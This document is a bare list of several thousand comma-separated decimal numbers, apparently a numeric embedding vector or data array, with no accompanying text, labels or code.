0.026272721588611603, -0.01466638594865799, 0.014739244244992733, -0.037828054279088974, -0.0011447868309915066, 0.018826598301529884, 0.030221644788980484, 0.013318507000803947, -0.009843163192272186, 0.034359999001026154, 0.11505790799856186, 0.005857811309397221, -0.022105224430561066, -0.025383850559592247, -0.004965296480804682, -0.0023806465324014425, 0.02089577540755272, -0.0063605341129004955, -0.020604342222213745, -0.06306619197130203, 0.006641038693487644, -0.027380168437957764, -0.02551499381661415, 0.00261197192594409, -0.0045645758509635925, -0.0031292662024497986, 0.025733569636940956, 0.011489761993288994, -0.0020855702459812164, 0.006120101548731327, -0.030629651620984077, -0.059802133589982986, -0.027904748916625977, 0.013741085305809975, 0.00024612463312223554, 0.006010814104229212, 0.0208229161798954, -0.020837487652897835, 0.031125087291002274, 0.001532757538370788, -0.03739090636372566, -0.015664545819163322, -0.0027649744879454374, 0.008947005495429039, -0.018914027139544487, -0.025208989158272743, -0.0026647942140698433, -0.022819235920906067, 0.023474961519241333, -0.01592683605849743, -0.024261830374598503, 0.020210906863212585, -0.01557711511850357, 0.016611704602837563, 0.02232379838824272, 0.03438914194703102, -0.007187476381659508, 0.03829434886574745, 0.04100468009710312, -0.01805429905653, 0.024830125272274017, -0.04304471239447594, -0.02070634439587593, 0.009231152944266796, -0.010498888790607452, -0.020954061299562454, 0.012254774570465088, 0.00021789201127830893, 0.02720530889928341, -0.009289439767599106, 0.015373112633824348, -0.027846461161971092, 0.01519825216382742, 0.000923024257645011, 0.006611895281821489, -0.028997624292969704, -0.002482648240402341, 0.008852289989590645, 0.011992484331130981, -0.02195950783789158, 0.004812294151633978, -0.0015400433912873268, 0.010484316386282444, -0.00563923642039299, -0.0011857696808874607, 0.004539075307548046, -0.04802822694182396, 0.0013214683858677745, -0.027846461161971092, 0.010061738081276417, -0.023984968662261963, -0.01971546933054924, -0.010287599638104439, -0.019526038318872452, -0.01202891394495964, 0.01007630955427885, 0.018768310546875, -0.018520593643188477, -0.028735334053635597, -0.005446161609143019, 0.004743078723549843, 0.04543446749448776, 0.0006939757731743157, -0.05738323926925659, -0.008269422687590122, -0.03106680139899254, -0.002289573661983013, -0.020764630287885666, 0.015096249990165234, 0.02322724275290966, 0.008531712926924229, -0.01573740318417549, -0.007985275238752365, 0.035671450197696686, -0.006243960931897163, -0.005646522156894207, 0.00010974289034493268, 0.0032294464763253927, -0.006549965590238571, -0.040917251259088516, -0.0009872306836768985, 0.022032365202903748, -0.0034990222193300724, -0.035467445850372314, -0.0069106146693229675, -0.05015568807721138, -0.03709947317838669, -0.01624741218984127, 0.003832349320873618, -0.010324028320610523, -0.0055955215357244015, 0.02551499381661415, -0.019147174432873726, -0.00944244209676981, -0.0013242005370557308, 0.01707799732685089, -0.006721182726323605, -0.011147327721118927, -0.0016274733934551477, -0.0033478413242846727, -0.0018241909565404058, -0.014651814475655556, 0.0001948960853042081, -0.02109977789223194, -0.039022933691740036, 0.00983587745577097, 0.02133292518556118, -0.020487768575549126, -0.022411229088902473, -0.03599202632904053, 0.01597055047750473, -0.023649821057915688, -0.01519825216382742, 0.018826598301529884, -0.020648056641221046, -0.002121999394148588, -0.013908659107983112, 0.011387760750949383, 0.017952298745512962, -0.007890559732913971, -0.0008597285486757755, 0.03386456146836281, 0.03989723324775696, -0.023168954998254776, 0.012961500324308872, 0.0023515033535659313, 0.009413299150764942, -0.03106680139899254, -0.01446966826915741, -0.015985121950507164, -0.03730347752571106, 0.05951070040464401, -0.04243270307779312, 0.0003228535642847419, 0.0008906933362595737, -0.0019088888075202703, -0.001954425359144807, -0.0003843278100248426, 0.01763172075152397, -0.006517179775983095, -0.023008666932582855, 0.011526191607117653, 0.027569599449634552, 0.014017947018146515, 0.0376240536570549, -0.003495379351079464, -0.005049083847552538, 0.04531789571046829, -0.019584324210882187, 0.016699133440852165, -0.027584172785282135, 0.004520860500633717, -0.005919741000980139, -0.021405784413218498, 0.03027993068099022, -0.008990720845758915, 0.02066262811422348, 0.015445970930159092, -0.014411382377147675, -0.035904597491025925, -0.011956055648624897, -0.015460542403161526, -0.034680575132369995, -0.02232379838824272, 0.011759337969124317, -0.04762021824717522, 0.0043059284798800945, 0.012859499081969261, -0.004812294151633978, -0.009158294647932053, -0.0015637223841622472, 0.05426489934325218, -0.03380627557635307, -0.013376792892813683, -0.025383850559592247, -0.03027993068099022, -0.018943171948194504, 0.010732035152614117, 0.023547818884253502, 0.006353248376399279, 0.02086663246154785, -0.03593374043703079, -0.032990261912345886, -0.03686632588505745, 0.02362067811191082, 0.05417747050523758, -0.0032859116327017546, -0.006254889536648989, 0.026199862360954285, -0.045521896332502365, 0.009340440854430199, 0.01297607272863388, -0.013231076300144196, -0.031999386847019196, 0.0013132718158885837, -0.03150395303964615, -0.0200651902705431, -0.05239972472190857, 0.05566377937793732, 0.03642917424440384, 0.0010582675458863378, -0.028881050646305084, 0.013529796153306961, -0.006899686064571142, 0.01068831980228424, 0.015781119465827942, -0.007274906616657972, -0.01547511387616396, 0.02195950783789158, 0.021711789071559906, 0.03179538622498512, 0.0010300349676981568, 0.03025078773498535, 0.04543446749448776, 0.029595062136650085, 0.022148938849568367, -0.03319426625967026, -0.03610859811306, -0.02255694568157196, -0.0005842329119332135, 0.03610859811306, -0.01696142368018627, -0.021318353712558746, -0.007467980962246656, 0.0020491410978138447, 0.010761178098618984, -0.021507784724235535, 0.01283764187246561, 0.0011557155521586537, -0.012123629450798035, -0.005624664947390556, -0.0589861199259758, 0.03890635818243027, -0.006043600384145975, 0.0025901144836097956, -0.00922386720776558, -0.04523046314716339, 0.0011083576828241348, 0.0010191062465310097, -0.003927065059542656, 0.007839558646082878, -0.002581007080152631, 0.026899304240942, 0.016669990494847298, -0.034010279923677444, -0.002121999394148588, 0.03191195800900459, -0.013048931024968624, 0.004280427936464548, 0.021085206419229507, -0.016626276075839996, -0.03269882872700691, 0.04435616359114647, -0.03572973608970642, -0.024101542308926582, 0.0019016029546037316, 0.018462305888533592, -0.01710714027285576, -0.01460809912532568, 0.03642917424440384, -0.04878595098853111, -0.013908659107983112, -0.03596288338303566, 0.012495207600295544, 0.0007126457639969885, -0.009143723174929619, -0.0026647942140698433, 0.0030582293402403593, -0.03380627557635307, 0.027030447497963905, -0.005136513616889715, 0.029682492837309837, -0.021245494484901428, -0.03095022775232792, 0.0014489705208688974, 0.07431551814079285, 0.04776593670248985, 0.01122018601745367, -0.02262980490922928, -0.03249482437968254, 0.014418668113648891, -0.008291280828416348, -0.00014264299534261227, 0.02207607962191105, 0.03415599465370178, 0.00005199695806368254, 0.0029398344922810793, 0.0076064118184149265, 0.025106988847255707, 0.01802515611052513, -0.013376792892813683, -0.029828209429979324, 0.0005869651213288307, 0.020997777581214905, 0.02251323126256466, 0.0025773642119020224, -0.05831582471728325, -0.032115962356328964, -0.02708873525261879, -0.03809034451842308, -0.00427678506821394, 0.01173019502311945, 0.0201089046895504, -0.0255587100982666, -0.05878211930394173, -0.003469879040494561, -0.020444054156541824, -0.03733262047171593, -0.006761255208402872, 0.006422463804483414, 0.004196641035377979, -0.009005292318761349, -0.008611856959760189, -0.024596979841589928, -0.002240394242107868, 0.02882276475429535, -0.006896043196320534, -0.0455801859498024, -0.0023442173842340708, 0.01770457997918129, 0.0007085474790073931, -0.007817701436579227, 0.01502339169383049, -0.004728506784886122, -0.017646292224526405, -0.026986733078956604, 0.03095022775232792, -0.0033970207441598177, -0.036225173622369766, -0.0008456122595816851, -0.05146713927388191, -0.00028619670774787664, 0.0017340288031846285, 0.006593680940568447, -0.004499003291130066, -0.0039926376193761826, 0.010316742584109306, 0.03616688400506973, -0.03048393502831459, 0.0033259836491197348, -0.028181610628962517, 0.015664545819163322, -0.006418820936232805, -0.01703428290784359, 0.010345885530114174, 0.04187897965312004, -0.03642917424440384, 0.015562543645501137, 0.008269422687590122, 0.02535470575094223, 0.02424725890159607, 0.014520669355988503, 0.002759509952738881, -0.04190812259912491, -0.03406856581568718, -0.010753892362117767, -0.03004678338766098, -0.028560474514961243, -0.009158294647932053, 0.023912111297249794, 0.00883043184876442, 0.018680881708860397, -0.03966408595442772, 0.0429864265024662, 0.03631260246038437, -0.0017312965355813503, -0.022134367376565933, -0.05761638283729553, 0.0790950283408165, -0.021274639293551445, -0.03339826688170433, 0.004029066767543554, -0.03899379074573517, -0.009464300237596035, -0.01668456196784973, -0.02327095717191696, -0.03025078773498535, 0.030542220920324326, 0.02058977074921131, 0.030804511159658432, 0.012611780315637589, -0.003194838762283325, -0.0051911575719714165, -0.012626352719962597, 0.04319043084979057, 0.040596675127744675, -0.014979677274823189, 0.027263594791293144, -0.006848684977740049, -0.006721182726323605, -0.018229160457849503, -0.013478795066475868, 0.004389715846627951, -0.01640770025551319, 0.04438530653715134, -0.004087353590875864, -0.0013906838139519095, 0.006702968385070562, 0.018666310235857964, 0.007671984378248453, -0.0003303670964669436, -0.008757573552429676, 0.039256080985069275, -0.023766394704580307, 0.015241967514157295, -0.013653655536472797, 0.012997929938137531, -0.010440601967275143, 0.016218269243836403, 0.022600660100579262, 0.01659713312983513, -0.017646292224526405, -0.013755656778812408, -0.009537158533930779, 0.007759414613246918, -0.007905131205916405, -0.010855894535779953, -0.01833116076886654, 0.015125393867492676, -0.010258455760776997, 0.018389448523521423, 0.00565745122730732, -0.014476954005658627, -0.005577306728810072, -0.030513077974319458, -0.0074825529009103775, -0.013456937856972218, -0.003604667028412223, 0.048640236258506775, -0.05318659543991089, 0.024349261075258255, 0.017019711434841156, -0.005391518119722605, 0.024975843727588654, -0.011824910528957844, -0.00149359623901546, 0.014549813233315945, -0.029988497495651245, 0.0013742906739935279, 0.01731114462018013, -0.017966870218515396, 0.006892399862408638, -0.033573128283023834, -0.0065281083807349205, 0.043715011328458786, 0.01502339169383049, -0.03229082003235817, 0.017121711745858192, 0.02313981205224991, 0.01084132306277752, -0.03127080574631691, -0.010294885374605656, 0.0027850104961544275, -0.021362068131566048, -0.009646445512771606, 0.010491603054106236, -0.0018387626623734832, 0.009347726590931416, 0.01601426489651203, 0.025500422343611717, -0.032553110271692276, 0.007256691809743643, 0.03911036252975464, 0.006098243873566389, -0.029551347717642784, -0.014644528739154339, 0.01830201782286167, -0.007897845469415188, 0.002613793360069394, -0.013806657865643501, 0.04444359615445137, 0.014965105801820755, 0.007526267785578966, 0.029157912358641624, -0.008240279741585255, -0.011817624792456627, -0.017762865871191025, 0.001346968812867999, 0.02019633539021015, -0.01691770926117897, 0.01604340970516205, 0.008174707181751728, -0.048989955335855484, -0.0028742619324475527, -0.026476724073290825, 0.014965105801820755, 0.031329091638326645, -0.023955825716257095, -0.03508858382701874, -0.013828515075147152, -0.007832272909581661, 0.009624588303267956, 0.021114349365234375, 0.003142016474157572, -0.016057981178164482, -0.019453179091215134, 0.051671143621206284, 0.007231191266328096, 0.00563923642039299, 0.005107370670884848, -0.020924918353557587, -0.0036593107506632805, 0.038818929344415665, -0.02160978689789772, -0.007569982670247555, -0.02223636955022812, -0.011373188346624374, -0.007398765534162521, 0.024203544482588768, 0.011926911771297455, 0.031183375045657158, -0.01881202682852745, -0.00004249121775501408, 0.011351331137120724, 0.01325293444097042, -0.008429711684584618, 0.004881509579718113, 0.049106527119874954, 0.03820692002773285, -0.0150816785171628, -0.022367514669895172, -0.0063823917880654335, -0.004291357006877661, -0.006305890157818794, -0.01573740318417549, 0.03325255215167999, -0.03549658879637718, -0.016495130956172943, 0.031008513644337654, 0.002446219092234969, 0.028895622119307518, -0.0019362106686457992, -0.004528146702796221, 0.005395160987973213, 0.006083672400563955, -0.010491603054106236, -0.017850296571850777, 0.016495130956172943, 0.03599202632904053, -0.01419280655682087, 0.024305546656250954, -0.010258455760776997, -0.004775865003466606, 0.021478641778230667, 0.01163547858595848, -0.0062694610096514225, -0.006870542652904987, -0.01844773441553116, 0.016815707087516785, -0.025821000337600708, -0.02109977789223194, 0.029988497495651245, -0.006553608924150467, 0.050534553825855255, 0.017063425853848457, 0.0058104535564780235, -0.00020844319078605622, 0.030979370698332787, 0.006254889536648989, -0.017456861212849617, -0.012757496908307076, -0.03943093866109848, 0.004746721591800451, -0.02105606347322464, 0.01060817576944828, 0.017136285081505775, 0.0038177776150405407, -0.00536237470805645, 0.003948922734707594, 0.008947005495429039, 0.014644528739154339, -0.008502569980919361, 0.022731805220246315, -0.0075408392585814, 0.030891941860318184, -0.0025500422343611717, -0.036370888352394104, 0.026331007480621338, 0.011518904939293861, 0.0004118773795198649, 0.008764859288930893, -0.028647903352975845, -0.02708873525261879, -0.031999386847019196, -0.062366750091314316, -0.012327632866799831, -0.0481739416718483, -0.005289516411721706, 0.037798911333084106, -0.005803167819976807, 0.013456937856972218, -0.003810491878539324, -0.026957590132951736, 0.008874147199094296, 0.00023075606441125274, -0.0497768260538578, 0.0281087514013052, -0.002573721343651414, -0.019861185923218727, -0.009770304895937443, -0.0028542259242385626, 0.014229236170649529, 0.020079761743545532, 0.0214494988322258, -0.010491603054106236, 0.0033278053160756826, -0.036341745406389236, -0.016422271728515625, 0.013107217848300934, -0.04190812259912491, 0.017165428027510643, -0.0018533343682065606, 0.001404344686307013, -0.011708336882293224, -0.041383542120456696, -0.018826598301529884, 0.03284454345703125, 0.030542220920324326, -0.0034152353182435036, 0.011351331137120724, -0.006378748454153538, -0.0007030831184238195, 0.03809034451842308, -0.008670143783092499, 0.004437073599547148, 0.01975918561220169, -0.006240317597985268, 0.02673901431262493, -0.014010661281645298, 0.009646445512771606, 0.0039999233558773994, -0.004007209558039904, -0.024436691775918007, -0.04846537485718727, 0.00979944784194231, 0.02153692953288555, -0.03039650432765484, 0.0021948579233139753, 0.012065342627465725, -0.001207627123221755, 0.009967022575438023, -0.01097975391894579, -0.0007099135546013713, -0.0010637319646775723, 0.03806120157241821, -0.009748447686433792, 0.010090881958603859, 0.0019963188096880913, -0.020210906863212585, 0.0005646522040478885, -0.0030855510849505663, -0.016859423369169235, -0.03721604496240616, 0.028050465509295464, 0.013405936770141125, 0.016305699944496155, -0.04587161913514137, 0.0005746702663600445, 0.03532172739505768, 0.005038154777139425, -0.004247642122209072, 0.035904597491025925, 0.02177007496356964, -0.029667921364307404, 0.010761178098618984, 0.027147021144628525, -0.007089117541909218, -0.04033438488841057, -0.0009999808389693499, -0.012990644201636314, 0.020050618797540665, 0.001384308678098023, -0.00506729818880558, -0.0055736638605594635, -0.007497124373912811, -0.017179999500513077, 0.005049083847552538, 0.019336607307195663, 0.01547511387616396, 0.01991947367787361, 0.025966716930270195, -0.006345962639898062, 0.016538845375180244, 0.014076233841478825, -0.03584630787372589, -0.0004840526671614498, 0.027394739910960197, 0.008123706094920635, -0.0057412381283938885, -0.014076233841478825, 0.006600966677069664, -0.028924765065312386, -0.015985121950507164, 0.0013132718158885837, 0.004265856463462114, -0.016946852207183838, 0.015824833884835243, -0.0011702872579917312, 0.0248884130269289, -0.015999693423509598, 0.02397039718925953, 0.012961500324308872, -0.009712018072605133, 0.006608252413570881, -0.007172904908657074, -0.027307311072945595, -0.010178311727941036, -0.020954061299562454, 0.013850372284650803, -0.0007650126935914159, -0.01710714027285576, 0.034564003348350525, 0.013595368713140488, -0.005453447811305523, 0.029522204771637917, -0.007613697554916143, -0.022571517154574394, -0.0028214396443217993, -0.008371424861252308, -0.00004476804315345362, -0.033339980989694595, 0.028006751090288162, -0.0096974465996027, 0.00579588208347559, -0.01033131405711174, 0.015460542403161526, -0.011999770067632198, 0.0031875527929514647, -0.036225173622369766, 0.01119832880795002, -0.01696142368018627, -0.01161362137645483, -0.018549736589193344, 0.03561316058039665, 0.024043256416916847, -0.016786564141511917, 0.0020491410978138447, -0.010753892362117767, -0.0007085474790073931, -0.0016238305252045393, 0.011956055648624897, -0.014127233996987343, 0.014119948260486126, -0.016567988321185112, 0.006535394117236137, 0.007034474052488804, -0.03549658879637718, 0.02570442669093609, -0.024232687428593636, -0.002298681065440178, -0.011577191762626171, 0.014207378961145878, -0.0005951616331003606, -0.014935961924493313, -0.024159830063581467, -0.004134711343795061, 0.03765319660305977, -0.0024535050615668297, 0.004601004999130964, -0.002220358233898878, 0.005180228967219591, -0.01256078016012907, -0.020764630287885666, 0.0008943362627178431, -0.028487615287303925, 0.002826903946697712, 0.008786717429757118, 0.020968632772564888, -0.013012501411139965, 0.005267658736556768, 0.0281087514013052, 0.015620830468833447, -0.0036665964871644974, -0.03339826688170433, -0.0414709746837616, 0.016465988010168076, 0.0026957590598613024, -0.025573281571269035, 0.013668227009475231, -0.008575428277254105, 0.03304854780435562, -0.001827833941206336, 0.013646368868649006, -0.031329091638326645, 0.004233070183545351, -0.009879592806100845, -0.031212517991662025, -0.025267276912927628, 0.004243998788297176, -0.012014342471957207, 0.021828362718224525, -0.021274639293551445, -0.008932434022426605, -0.0010637319646775723, -0.022105224430561066, -0.009631874039769173, 0.0038068487774580717, -0.029070481657981873, 0.008582714013755322, -0.014338523149490356, -0.046396199613809586, -0.013770228251814842, -0.015635402873158455, 0.01987575739622116, -0.014200092293322086, 0.018899455666542053, 0.019074317067861557, 0.030075928196310997, -0.026097862049937248, 0.009209295734763145, 0.000009790341209736653, -0.0510299876332283, -0.020575199276208878, -0.009763019159436226, -0.007970703765749931, 0.0008929701871238649, 0.01541682705283165, -0.019584324210882187, -0.004582790192216635, -0.03908121958374977, 0.03004678338766098, 0.016393128782510757, 0.006276747211813927, -0.006611895281821489, -0.014571670442819595, 0.004925224464386702, 0.012932357378304005, -0.04957282170653343, 0.02606871910393238, -0.02381010912358761, -0.015518829226493835, -0.023926682770252228, 0.026316436007618904, 0.014761102385818958, 0.023008666932582855, -0.019817471504211426, 0.02026919275522232, 0.0038724213372915983, -0.024436691775918007, -0.0103677436709404, -0.005682951305061579, -0.019934045150876045, -0.016815707087516785, 0.044968172907829285, 0.008400567807257175, 0.015256538987159729, -0.0348554365336895, 0.014017947018146515, 0.03103765845298767, -0.011045326478779316, 0.01770457997918129, 0.026841016486287117, 0.007424266077578068, -0.003025443060323596, -0.017792008817195892, 0.00288883363828063, 0.015985121950507164, -0.02038576640188694, -0.008611856959760189, -0.03841092437505722, -0.014447811059653759, -0.02413068525493145, 0.025106988847255707, 0.04928138852119446, 0.01908888854086399, -0.01173019502311945, 0.006327747832983732, -0.008072705008089542, 0.0140543757006526, -0.0076064118184149265, 0.007212976925075054, -0.029988497495651245, -0.0030400147661566734, 0.03191195800900459, -0.01066646259278059, 0.02026919275522232, 0.007890559732913971, -0.011322188191115856, 0.03194110095500946, 0.01758800633251667, 0.048203084617853165, -0.019336607307195663, 0.003389734774827957, -0.005147442687302828, -0.010127310641109943, -0.0071328324265778065, 0.01860802248120308, -0.02223636955022812, -0.004703006707131863, 0.014593527652323246, 0.01228391844779253, 0.014433239586651325, 0.0047102924436330795, -0.0038287064526230097, 0.0020964990835636854, 0.010098167695105076, -0.008670143783092499, 0.01194876991212368, -0.02914334088563919, -0.04342357814311981, 0.03103765845298767, 0.04756193235516548, 0.010098167695105076, -0.014280237257480621, 0.010681034065783024, -0.0002513613144401461, 0.01742771826684475, 0.0035664162132889032, 0.004622862208634615, 0.012662781402468681, -0.02128921076655388, 0.011664622463285923, -0.03048393502831459, 0.042490988969802856, -0.01222563162446022, 0.012524350546300411, -0.02050234004855156, -0.0004187078448012471, -0.02764245867729187, -0.004757650196552277, 0.0035099510569125414, -0.007140118628740311, -0.002464433666318655, -0.0024498619604855776, -0.025136131793260574, -0.03197024390101433, -0.005766738671809435, 0.007100046146661043, 0.0100544523447752, 0.0044516450725495815, 0.019467752426862717, 0.0033332696184515953, -0.0029416559264063835, -0.005766738671809435, -0.0036884541623294353, 0.010018023662269115, -0.017325716093182564, -0.003799563040956855, -0.012633638456463814, 0.011285758577287197, -0.017690008506178856, -0.02070634439587593, 0.0016119909705594182, -0.02357696183025837, 0.011540763080120087, -0.019773757085204124, -0.009544444270431995, -0.014979677274823189, -0.030134214088320732, 0.012597208842635155, -0.009143723174929619, -0.01547511387616396, -0.030134214088320732, -0.021580643951892853, -0.01046974491328001, -0.004866938106715679, 0.01080489344894886, 0.007766700349748135, 0.08766316622495651, -0.015562543645501137, 0.01664084754884243, -0.020531482994556427, -0.007311335764825344, 0.013901373371481895, 0.020924918353557587, -0.01553340069949627, 0.031241660937666893, 0.002023640787228942, 0.0021675359457731247, 0.016815707087516785, -0.0052130152471363544, 0.00971930380910635, 0.014229236170649529, 0.014520669355988503, -0.016305699944496155, -0.025252705439925194, 0.02708873525261879, -0.016553416848182678, 0.00550080556422472, 0.014622671529650688, -0.006258532404899597, -0.015212823636829853, 0.038265205919742584, -0.007817701436579227, -0.018083442002534866, -0.03543830290436745, -0.029405631124973297, -0.0028323684819042683, 0.0028833693359047174, 0.002475362503901124, -0.021026920527219772, -0.006083672400563955, 0.002877904800698161, 0.02468440867960453, 0.015635402873158455, -0.005311373621225357, -0.025456707924604416, -0.028239896520972252, -0.026913875713944435, -0.01608712412416935, -0.013136360794305801, 0.02098320610821247, 0.010542603209614754, -0.01358808297663927, -0.0077739860862493515, 0.016859423369169235, -0.016509702429175377, 0.011380474083125591, 0.009034435264766216, -0.005519019905477762, 0.0007713877712376416, 0.02117263711988926, 0.016261983662843704, -0.0025955787859857082, -0.027263594791293144, -0.015504256822168827, -0.0077521284110844135, -0.006681110709905624, 0.009231152944266796, 0.0032768044620752335, -0.011686479672789574, 0.028065036982297897, -0.01585397683084011, -0.0038833501748740673, -0.03809034451842308, 0.0018779239617288113, -0.035671450197696686, 0.012670067138969898, 0.006954329553991556, -0.005894240457564592, 0.002092856215313077, 0.013121789321303368, -0.000388198415748775, -0.02262980490922928, 0.011759337969124317, 0.02152235619723797, -0.024553263559937477, 0.0007436105515807867, 0.0057885958813130856, 0.027292737737298012, -0.0005282230558805168, 0.014761102385818958, 0.008181992918252945, 0.031562238931655884, -0.03316512331366539, 0.0038032059092074633, -0.0015928656794130802, -0.001965353963896632, -0.005577306728810072, 0.0074606952257454395, 0.024975843727588654, -0.005424304399639368, -0.001748600392602384, 0.039168648421764374, -0.002763153053820133, -0.028006751090288162, -0.023445816710591316, 0.0008419693331234157, 0.010513460263609886, 0.010768464766442776, 0.004560932982712984, -0.007781271822750568, -0.016261983662843704, 0.011817624792456627, 0.025019558146595955, -0.009260296821594238, -0.008910576812922955, -0.0031766241881996393, -0.010236598551273346, 0.0049543678760528564, 0.011467904783785343, 0.0060472432523965836, -0.006753969006240368, 0.02338753081858158, 0.009282154031097889, -0.0070563312619924545, -0.020750058814883232, -0.01147519052028656, -0.02646215260028839, 0.0017057961085811257, 0.02512156032025814, -0.03983894735574722, 0.021303782239556313, 0.005635593552142382, 0.037245187908411026, -0.018433162942528725, 0.020021475851535797, 0.0066519672982394695, 0.024626122787594795, 0.009420584887266159, 0.009901450015604496, 0.00794884655624628, 0.008240279741585255, -0.014323951676487923, 0.04018866643309593, 0.012750211171805859, 0.00033423767308704555, 0.01588311977684498, -0.008203850127756596, 0.024480406194925308, -0.016305699944496155, 0.012844927608966827, 0.011110899038612843, 0.003941636998206377, -0.005996242165565491, 0.014768388122320175, 0.023766394704580307, -0.0034298067912459373, -0.0027831890620291233, -0.03514686971902847, 0.00496893934905529, 0.014702815562486649, 0.0011165542528033257, -0.008655572310090065, 0.005963455885648727, -0.023984968662261963, -0.005548163317143917, 0.0023423959501087666, -0.008050847798585892, 0.007278549484908581, 0.00565745122730732, -0.010957895778119564, -0.0014453275362029672, 0.023955825716257095, -0.01197062712162733, -0.02026919275522232, -0.010214741341769695, -0.005682951305061579, 0.02708873525261879, -0.006280390080064535, -0.02366439253091812, 0.008779431693255901, 0.006648324429988861, 0.041150398552417755, 0.009748447686433792, 0.005854168441146612, 0.05919012427330017, -0.03672060742974281, 0.0045500039122998714, -0.02101234905421734, 0.0068887569941580296, -0.006010814104229212, 0.004845080431550741, -0.01608712412416935, -0.0045135747641325, 0.0096974465996027, -0.049106527119874954, 0.017558863386511803, 0.012174630537629128, 0.019904902204871178, 0.0006306801224127412, -0.011482476256787777, 0.024261830374598503, -0.018768310546875, 0.004273142199963331, -0.011154613457620144, 0.008546284399926662, -0.01589769311249256, 0.0027267239056527615, -0.03060050681233406, -0.007642840966582298, -0.008225708268582821, -0.0017996012466028333, -0.030571363866329193, -0.006950686685740948, 0.028647903352975845, -0.002642936771735549, 0.00950072892010212, -0.014994248747825623, -0.010761178098618984, -0.002963513368740678, 0.00039525656029582024, 0.03395199030637741, 0.009289439767599106, -0.009078150615096092, -0.013507938012480736, 0.0040691387839615345, 0.014076233841478825, -0.007329550106078386, -0.018462305888533592, -0.01084132306277752, 0.0020108905155211687, -0.023518675938248634, 0.00198721163906157, 0.015285681933164597, -0.02267351932823658, 0.003063693642616272, 0.004655648488551378, -0.020356623455882072, -0.01777743734419346, -0.007744842674583197, 0.002622900763526559, -0.029187055304646492, -0.011577191762626171, 0.011176470667123795, 0.0025901144836097956, -0.0024607907980680466, 0.0003929797385353595, -0.010855894535779953, 0.01044788770377636, -0.024465834721922874, -0.02539842203259468, -0.020881203934550285, -0.0002028649760177359, 0.0031547665130347013, 0.0023223599418997765, -0.004174783360213041, 0.011227471753954887, -0.00022506399545818567, 0.009282154031097889, 0.007446123752743006, -0.010797607712447643, -0.015227395109832287, -0.002633829368278384, -0.005151085555553436, -0.019904902204871178, -0.0023515033535659313, -0.010302171111106873, 0.015445970930159092, -0.01297607272863388, -0.007278549484908581, 0.012291204184293747, -0.025092415511608124, 0.011271187104284763, -0.03135823458433151, 0.015985121950507164, -0.009172866120934486, 0.022032365202903748, 0.020997777581214905, 0.025718998163938522, -0.015110822394490242, -0.006513536442071199, -0.020414909347891808, 0.013201933354139328, -0.0011338581098243594, -0.007854130119085312, -0.007708413526415825, 0.00516565702855587, -0.014629957266151905, 0.02847304381430149, 0.017690008506178856, -0.03931436687707901, 0.00573759526014328, -0.02531099133193493, -0.03540915995836258, 0.0063823917880654335, -0.029871923848986626, -0.008349566720426083, 0.0060326713137328625, 0.003681168192997575, 0.006957972422242165, -0.01589769311249256, 0.015941407531499863, -0.00794884655624628, -0.014994248747825623, 0.030775368213653564, 0.009070864878594875, -0.006768540944904089, 0.00339519907720387, 0.04068410396575928, -0.004757650196552277, -0.0007927899132482708, 0.012021628208458424, -0.021230923011898994, -0.0214494988322258, -0.00062840327154845, -0.0008342281216755509, 0.007387836929410696, -0.03398113697767258, 0.009886878542602062, -0.03229082003235817, -0.027278166264295578, 0.0007103689131326973, -0.020560625940561295, -0.011766623705625534, 0.014323951676487923, -0.03876064345240593, 0.023591533303260803, 0.01588311977684498, -0.004203926771879196, -0.004433430731296539, -0.019904902204871178, -0.0003647471312433481, -0.004728506784886122, 0.010258455760776997, 0.0006279479130171239, 0.009420584887266159, -0.01013459637761116, 0.02701587602496147, -0.0004881509521510452, 0.039022933691740036, -0.009959736838936806, -0.0042367130517959595, -0.006243960931897163, 0.03829434886574745, 0.013748371042311192, -0.0117520522326231, -0.00479043647646904, -0.04963110759854317, 0.019176317378878593, -0.008189278654754162, 0.005315016955137253, 0.013464223593473434, 0.0013132718158885837, 0.01466638594865799, -0.002307788236066699, -0.01256078016012907, -0.03194110095500946, -0.0046629346907138824, -0.008480711840093136, 0.012524350546300411, 0.011409617960453033, -0.003752205055207014, 0.019526038318872452, 0.017179999500513077, 0.016072552651166916, 0.016859423369169235, -0.026870159432291985, -0.02854590304195881, 0.0024990413803607225, -0.016495130956172943, 0.012101772241294384, 0.00869200099259615, -0.027147021144628525, -0.0005751256248913705, 0.011759337969124317, 0.0001659804256632924, -0.010120024904608727, 0.018156301230192184, 0.0016292949439957738, 0.005784953013062477, -0.0009553551208227873, 0.007839558646082878, 0.0061237444169819355, 0.019234605133533478, -0.03776976838707924, -0.0347680039703846, 0.023081526160240173, -0.015999693423509598, -0.005930669605731964, 0.0025901144836097956, -0.00498715415596962, -0.022571517154574394, -0.01038960088044405, -0.005289516411721706, -0.01849144883453846, -0.019176317378878593, -0.002089213114231825, 0.009355012327432632, 0.013296648859977722, 0.009573587216436863, 0.011941484175622463, -0.001472649397328496, 0.005635593552142382, 0.00479043647646904, 0.0071328324265778065, -0.020691771060228348, -0.016232840716838837, 0.0010491602588444948, 0.0001158903178293258, -0.01936575025320053, 0.018389448523521423, 0.014739244244992733, 0.011759337969124317, -0.01975918561220169, -0.020516911521553993, 0.029478488489985466, -0.022090652957558632, 0.0005282230558805168, -0.000007869271030358505, -0.022571517154574394, -0.01809801533818245, -0.0147246727719903, -0.009544444270431995, -0.007274906616657972, 0.012174630537629128, -0.006353248376399279, -0.009508014656603336, 0.025879286229610443, -0.013901373371481895, -0.008174707181751728, -0.01987575739622116, 0.013748371042311192, -0.0113950464874506, -0.021915791556239128, 0.006728468928486109, 0.00019853901176247746, 0.0005482591222971678, -0.007868701592087746, -0.006794041488319635, 0.004123782739043236, -0.013231076300144196, 0.022921238094568253, -0.0011757516767829657, -0.014440525323152542, -0.02042948268353939, -0.006171102169901133, 0.02093948982656002, 0.020181763917207718, -0.01652427390217781, 0.0073004066944122314, -0.015285681933164597, -0.004684791900217533, 0.014309380203485489, -0.01325293444097042, -0.02330010011792183, -0.008524427190423012, -0.009172866120934486, 0.020924918353557587, -0.01097975391894579, 0.009784876368939877, 0.030862797051668167, -0.0029835496097803116, 0.004356929566711187, -0.00008703157800482586, 0.003233089344576001, -0.0031656953506171703, -0.010695605538785458, 0.019686326384544373, -0.01519825216382742, 0.01920546218752861, 0.009690160863101482, 0.01385765802115202, 0.006087315268814564, 0.008845004253089428, -0.002289573661983013, -0.01125661563128233, 0.006043600384145975, 0.019846614450216293, 0.016975995153188705, 0.017792008817195892, -0.006375105585902929, 0.004393358714878559, 0.007905131205916405, -0.011147327721118927, -0.018345732241868973, -0.0022276442032307386, 0.013449652120471, 0.002278645057231188, 